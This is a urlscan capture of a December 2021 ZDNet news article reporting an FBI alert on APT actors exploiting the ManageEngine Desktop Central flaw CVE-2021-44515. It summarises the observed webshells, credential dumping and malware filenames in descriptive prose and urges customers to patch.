www.zdnet.com
Open in
urlscan Pro
2a04:4e42:4d::666
Public Scan
Submitted URL: https://t.co/UKBSLiMkKM
Effective URL: https://www.zdnet.com/article/fbi-hackers-are-actively-exploiting-this-flaw-on-manageengine-desktop-central-servers/
Submission: On December 21 via api from US — Scanned from DE
Effective URL: https://www.zdnet.com/article/fbi-hackers-are-actively-exploiting-this-flaw-on-manageengine-desktop-central-servers/
Submission: On December 21 via api from US — Scanned from DE
Form analysis
1 forms found in the DOMGET https://www.zdnet.com/search/
<form class="header-search" method="get" action="https://www.zdnet.com/search/">
<label for="header-search-field" class="hidden">What are you looking for?</label>
<input type="search" id="header-search-field" title="query" autocomplete="off" placeholder="What are you looking for?" tabindex="1" name="q" value="" class="smart-search-input">
<button type="submit" class="search-button" data-omniture-track="moduleClick" data-omniture-track-data="{"moduleInfo": "Header-Search", "pageType": "article"}"> Go </button>
</form>
Text Content
* * Central Europe * Middle East * Scandinavia * Africa * UK * Italy * Spain * Newsletters * Blogs * Menu More * Central Europe * Middle East * Scandinavia * Africa * UK * Italy * Spain * Estonia * European Union * Mobility * Hardware * Innovation * See All Topics * Newsletters * Blogs * Downloads * Reviews * Galleries * Videos * Edition: EU * Asia * Australia * Europe * India * United Kingdom * United States * ZDNet France * ZDNet Germany * ZDNet Korea * ZDNet Japan * * What are you looking for? Go * Join / Log In * Account * Preferences * Community * Newsletters * Log Out must read: How to lure employees back to the office? You can't. Not now. Not ever. FBI: HACKERS ARE ACTIVELY EXPLOITING THIS FLAW ON MANAGEENGINE DESKTOP CENTRAL SERVERS Zoho released a patch in December, but attackers are still trying to use the flaw. * * * * * * * Written by Liam Tung, Contributor Liam Tung Contributor Liam Tung is an Australian business technology journalist living a few too many Swedish miles north of Stockholm for his liking. He gained a bachelors degree in economics and arts (cultural studies) at Sydney's Macquarie University, but hacked (without Norse or malicious code for that matter) his way into a career as an enterprise tech, security and telecommunications journalist with ZDNet Australia. Full Bio on December 21, 2021 | Topic: Security The FBI's cyber division has issued an alert warning enterprises using Zoho-owned ManageEngine's Desktop Central that advanced attackers have been exploiting a flaw to install malware since late October. Zoho released a patch for an authentication bypass flaw CVE-2021-44515 on December 3, warning at the time that it had seen "indications of exploitation" and urged customers to update immediately. Zoho didn't provide further details of the attacks at the time, which occurred after activity this year targeting previously patched flaws in ManageEngine products that are tracked as CVE-2021-40539 and CVE-2021-44077. However, the FBI says in the new alert that advanced persistent threat (APT) actors have been exploiting CVE-2021-44515 since at least October 2021. "Since at least late October 2021, APT actors have been actively exploiting a zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central servers," the FBI alert said. Microsoft has previously attributed some of the earlier activity to a Chinese hacker group that was installing web shells on compromised servers to gain persistence on compromised servers. The flaws affected IT management products used by end-user organizations and managed service providers. The FBI now says it observed APT actors compromising Desktop Central servers using the flaw, now known as CVE-2021-44515 to drop a webshell that overrides a legitimate function of Desktop Central. The attackers then downloaded post-exploitation tools, enumerated domain users and groups, conducted network reconnaissance, attempted lateral movement across the network and dumped credentials. ManageEngine is the enterprise IT management software division of Zoho, a company well known for its software-as-a-service products. The flaw affects Desktop Central software for both enterprise customers and the version for managed service provider (MSP) customers. The FBI has filled in some details about how attackers are abusing the flaw after obtaining samples that were downloaded from likely compromised ManageEngine ADSelfService Plus servers. It has seen attackers upload two variants of web shells with the filenames emsaler.zip (variant 1, late October 2021), eco-inflect.jar (variant 1, mid November 2021) and aaa.zip (variant 2, late November 2021). The webshell overrides the legitimate Desktop Central application protocol interface servlet endpoint. The webshell is also used for reconnaissance and domain enumeration. Eventually, the attackers install a remote access tool (RAT) for further intrusion, lateral movement, and credential dumping using the penetration testing tool Mimikatz, and LSASS process memory dumping. The attackers also used the Windows authentication protocol WDigest to steal credentials through an LSASS dump, signaling the attackers were using so-called 'living off the land' legitimate tools for nefarious purposes. Others tools in this category include Microsoft's BITSAdmin command-line tool "to download a likely ShadowPad variant dropper with filename mscoree.dll, and a legitimate Microsoft AppLaunch binary, iop.exe", according to the FBI. ManageEngine has strongly advised customers to update their installations to the latest build as soon as possible. Security TV | Data Management | CXO | Data Centers Show Comments LOG IN TO COMMENT * My Profile * Log Out | Community Guidelines JOIN DISCUSSION Add Your Comment Add Your Comment RELATED * * * * * * Log4j flaw: Now state-backed hackers are using bug as part of attacks, warns Microsoft * Log4j flaw: Attackers are making thousands of attempts to exploit this severe vulnerability * Suspected Iranian hackers target airline with new backdoor * How to get cloud storage costs under control * After ransomware attack, global logistics firm Hellmann warns of scam calls and mail * CISA, White House urge organizations to get ready for holiday cyberattacks * Ransomware suspect arrested over attacks on 'high-profile' organisations * Best last-minute gifts for hackers: Cybersecurity presents, secured * Victims awarded $18 million in GirlsDoPorn online video case, boss on the run ZDNet Connect with us © 2021 ZDNET, A RED VENTURES COMPANY. ALL RIGHTS RESERVED. Privacy Policy | Cookie Settings | Advertise | Terms of Use * Topics * Galleries * Videos * Sponsored Narratives * Do Not Sell My Information * About ZDNet * Meet The Team * All Authors * RSS Feeds * Site Map * Reprint Policy * Manage | Log Out * Join | Log In * Membership * Newsletters * Site Assistance * ZDNet Academy Cookie Settings We use cookies and similar technologies to understand how you use our services, improve your experience and serve you personalized content and advertising. By clicking "Accept All", you accept all cookies. By clicking "Reject All", you reject all cookies except Strictly Necessary cookies. To manage your cookies and learn more about our use of cookies click “Cookie Settings”.Learn more. Cookie Settings Reject All Accept All